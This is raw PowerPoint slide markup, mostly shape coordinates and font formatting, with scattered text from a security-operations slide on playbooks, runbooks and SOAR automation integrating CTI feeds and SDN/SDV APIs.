                <a:path w="12542519" h="1080770">
                  <a:moveTo>
                    <a:pt x="0" y="88773"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6977" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88773" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12453746" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12488298" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12516516" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12535542" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12542519" y="88773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12542519" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12535542" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12516516" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12488298" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12453746" y="1080515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88773" y="1080515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88773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715262" y="4688585"/>
              <a:ext cx="6367780" cy="551815"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6367780" h="551814">
                  <a:moveTo>
                    <a:pt x="6275323" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="91948" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56149" y="7223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26924" y="26924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7223" y="56149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="91948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="551688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6367271" y="551688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6367271" y="91948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6360048" y="56149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6340347" y="26924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6311122" y="7223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6275323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715262" y="4688585"/>
              <a:ext cx="6367780" cy="551815"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6367780" h="551814">
                  <a:moveTo>
                    <a:pt x="91948" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6275323" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6311122" y="7223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6340347" y="26924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6360048" y="56149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6367271" y="91948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6367271" y="551688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="551688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="91948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7223" y="56149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26924" y="26924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56149" y="7223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91948" y="0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899285" y="5578855"/>
            <a:ext cx="672274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lr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="110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75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dirty="0" sz="20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20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>has</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>accounts</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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12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dirty="0" sz="2000" spc="-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65">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>incident</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>reporting</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-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0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65">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>notification.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99285" y="4768723"/>
            <a:ext cx="134747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20">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Playbooks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695069" y="6631305"/>
            <a:ext cx="12561570" cy="1628775"/>
            <a:chOff x="1695069" y="6631305"/>
            <a:chExt cx="12561570" cy="1628775"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="object 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1704594" y="7171182"/>
              <a:ext cx="12542520" cy="1079500"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12542519" h="1079500">
                  <a:moveTo>
                    <a:pt x="0" y="88646"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6975" y="54167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25987" y="25987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54167" y="6975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88645" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12453873" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12488352" y="6975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12516532" y="25987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12535544" y="54167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12542519" y="88646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12542519" y="990346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12535544" y="1024851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12516532" y="1053028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12488352" y="1072025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12453873" y="1078992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88645" y="1078992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54167" y="1072025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25987" y="1053028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6975" y="1024851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="990346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88646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715262" y="6640830"/>
              <a:ext cx="6367780" cy="530860"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6367780" h="530859">
                  <a:moveTo>
                    <a:pt x="6278880" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="88392" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54006" y="6953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25908" y="25908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6953" y="54006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="530352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6367271" y="530352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6367271" y="88392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6360318" y="54006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6341364" y="25908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6313265" y="6953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6278880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715262" y="6640830"/>
              <a:ext cx="6367780" cy="530860"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6367780" h="530859">
                  <a:moveTo>
                    <a:pt x="88392" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6278880" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6313265" y="6953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6341364" y="25908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6360318" y="54006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6367271" y="88392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6367271" y="530352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="530352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6953" y="54006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25908" y="25908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54006" y="6953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88392" y="0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899285" y="7509205"/>
            <a:ext cx="555053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lr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="110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-65">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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65">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>playbook</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-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105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dirty="0" sz="2000" spc="-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60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>high</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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45">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>degree</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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110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0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80">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>automation.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99285" y="6699631"/>
            <a:ext cx="13277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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Ru</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5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2200" spc="105">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>bo</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="11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2200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>ks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705736" y="2179701"/>
            <a:ext cx="12563475" cy="2323465"/>
            <a:chOff x="1705736" y="2179701"/>
            <a:chExt cx="12563475" cy="2323465"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="object 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1727453" y="2189226"/>
              <a:ext cx="6367780" cy="706120"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6367780" h="706119">
                  <a:moveTo>
                    <a:pt x="6249670" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="117601" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71848" y="9249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34464" y="34464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9249" y="71848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="117601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="705612"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6367272" y="705612"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6367272" y="117601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6358022" y="71848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6332807" y="34464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6295423" y="9249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6249670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727453" y="2189226"/>
              <a:ext cx="6367780" cy="706120"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6367780" h="706119">
                  <a:moveTo>
                    <a:pt x="117601" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6249670" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6295423" y="9249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6332807" y="34464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6358022" y="71848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6367272" y="117601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6367272" y="705612"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="705612"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="117601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9249" y="71848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34464" y="34464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71848" y="9249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117601" y="0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715261" y="2742438"/>
              <a:ext cx="12544425" cy="1751330"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1751329">
                  <a:moveTo>
                    <a:pt x="12400153" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="143890" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98397" y="7332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58896" y="27753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27753" y="58896"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7332" y="98397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="143890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1607185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7332" y="1652678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27753" y="1692179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58896" y="1723322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98397" y="1743743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143890" y="1751076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12400153" y="1751076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12445646" y="1743743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12485147" y="1723322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12516290" y="1692179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12536711" y="1652678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="1607185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="143890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12536711" y="98397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12516290" y="58896"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12485147" y="27753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12445646" y="7332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124001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715261" y="2742438"/>
              <a:ext cx="12544425" cy="1751330"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1751329">
                  <a:moveTo>
                    <a:pt x="0" y="143890"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7332" y="98397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27753" y="58896"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58896" y="27753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98397" y="7332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143890" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12400153" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12445646" y="7332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12485147" y="27753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12516290" y="58896"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12536711" y="98397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="143890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="1607185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12536711" y="1652678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12516290" y="1692179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12485147" y="1723322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12445646" y="1743743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12400153" y="1751076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143890" y="1751076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98397" y="1743743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58896" y="1723322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27753" y="1692179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7332" y="1652678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1607185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="143890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1911223" y="2233040"/>
            <a:ext cx="11838940" cy="20358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45">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>SOAR</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="549275" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2510"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="549275" algn="l"/>
                <a:tab pos="549910" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-130">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>SOAR</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>uses</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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55">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>SDN</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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125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dirty="0" sz="20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20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>SDV</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>APIs,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-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70">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>orchestration</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-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40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>tools,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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0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30">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Cyber-Threat</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Intelligence</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-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95">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>(CTI)</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>feeds</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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12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endParaRPr sz="2000">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="549275">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="65">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>integrate</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-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90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>different</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-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30">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>systems</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-4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100">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-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20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>manages.·</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="549275" marR="5080" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="549275" algn="l"/>
                <a:tab pos="549910" algn="l"/>
                <a:tab pos="5311775" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Automated</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-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70">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>malware</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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55">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
